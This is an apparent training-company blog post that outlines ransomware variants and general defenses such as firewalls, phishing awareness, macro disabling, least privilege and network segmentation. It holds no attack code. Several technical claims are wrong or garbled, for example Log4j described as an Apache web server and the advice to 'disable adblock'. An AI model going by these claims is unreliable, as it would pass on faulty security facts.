UP TO 50% OFF on Combo Courses!

Ransomware- A Reality Check (Part 2)

Ransomware- A reality check 2

Variants of Ransomware

Bad Rabbit: It was distributed by a fake Adobe Flash update on a corrupt website. Fake Adobe Flash update; once it is downloaded, your data has been compromised.

Crypto wall: Malware hides in your zip files and other email attachments, and then it makes its way to your devices. Once you install them, it tries to find java vulnerabilities to encrypt or withhold your data.

Patia: It is a crypto-ransomware that targets your Windows servers, laptops, or PC and mostly takes advantage of SMB (Server Message Block) and tries to steal your credentials and spread them into your machine.

Wanna cry: It was first seen in a large-scale crypto-ransomware attack in 2017. It affected almost a quarter-million machines internationally, and it spreads through your windows operating system.

Black Byte: It is a notorious variant that compromised multiple US and foreign businesses, including three critical US infrastructure sectors. It encrypts your files and compromises the Windows host system, including physical and virtual servers.


The following are the countermeasures or defense mechanisms to be implemented to ensure safe data transfer:


Using Firewall to its fullest capability

Firewalls are the most reliable. If a firewall does not allow a malicious web request or an email security gateway has been implemented, then the users will not get any malicious attacks or emails. But if the firewall fails, there should be backup plans.

Log4j attack: Log4j vulnerability, an Apache web server, has been exploited in the wild by executing games and transforming from exploiting the game servers to the actual corporate servers.

User Education

For example, if an email passes through an email security gateway and firewall, and if the user is unaware of potential phishing emails, it develops the attack surface.

Kevin Mitnick, the most notorious hacker, started phishing the telephone, and the FBI searched for him a lot. There is training from this company called KnowBe4 that makes the user aware of phishing and how to identify emails received from an unsuspected user.

Disabling Macros execution

Now the execution of macros is the popular one where people get exploited. For example, a malicious document is attached to a mail received by the user unaware of it and thinks it is legitimate. He then opens the documents, and therefore the macros get enabled in the organization if he uses the organization network.

Macros are small code blocks that get executed automatically in the background, primarily when an office application is based on a visual basis. These codes are written to exploit any existing vulnerabilities in the computers.

Implement Web security

The Cross-site scripting attack- suppose your browser is vulnerable to any particular attack. These types of vulnerabilities of the browsers are exploited by visiting any malicious website.

There’s a well-known chef Jamie Oliver, whose website was vulnerable. As everyone visiting his website had downloaded the malicious code in the background. To overcome such malicious code, every organization should implement WAF rules and disable adblock.

CEH v11

Incorporate least privilege policy

Rule-based access control and our backup is most important. The privileged access to people only to perform the activity, not the full access, is part of a defense-in-depth strategy.

Network Segmentation

The HR Department is the one who receives more external emails document or PDF files when compared to the software development department. Do you think both guys should work on the same network to implement high security?.

If HR receives a malicious email and clicks, the malware starts spreading in the environment. For example, Wipro was part of the MSSP attack. A supply chain attack has been infected because some other team had clicked some URL that led people to come into the network. If they had segmented their network, they would have prevented it.

Active monitoring

Security Analyst Security Operation Center (SOC) monitors 24/7 alerts. They look to modify and identify the attacks. For example, when they figured out that log4j was being exploited by 3000 times of log4j attempts, they implemented alerts and security measures to block the attempt and notify us. That helps to take further steps and investigate that particular source or IP address.

Action Plan

It’s not about how you will be attacked; it’s about when you will be attacked. Even organizations with high security are compromised, and an Action plan helps in this case.

A clear and detailed action plan of what to do and how to do it when an attack occurs includes the most practical and effective countermeasure to implement quickly.

CompTIA Network+

Emaliya Keerthana
Content Writer
Emaliya Keerthana working as a Content Writer at InfosecTrain. She likes to explore the latest technology. She writes on emerging IT-related topics and is passionate about sharing her thoughts through blogs.
Cultivating a CISSP Mindset 10 Questions to Elevate Your Expertise